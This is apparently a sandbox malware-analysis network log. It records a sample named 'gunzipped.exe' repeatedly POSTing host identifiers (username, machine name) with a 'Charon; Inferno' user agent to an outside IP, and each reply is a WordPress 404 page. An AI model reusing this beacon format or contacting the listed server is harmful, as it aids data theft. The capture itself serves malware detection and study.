Apr 17, 2024 03:18:49.029333115 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:49.029373884 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:49.029412031 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:49.029450893 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:49.029489040 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:49.029526949 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:49.029567957 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	49791	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:49.380265951 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:49.588119030 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:50.517529964 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:49 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:50.517565012 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:50.517585039 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:50.517602921 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:50.517623901 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:50.517642021 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:50.517662048 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:50.517680883 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:50.517699957 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:50.517720938 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	49792	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:50.868000984 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:51.075810909 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:52.030656099 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:50 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:52.030715942 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:52.030755043 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:52.030795097 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:52.030833960 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:52.030874014 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:52.030915976 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
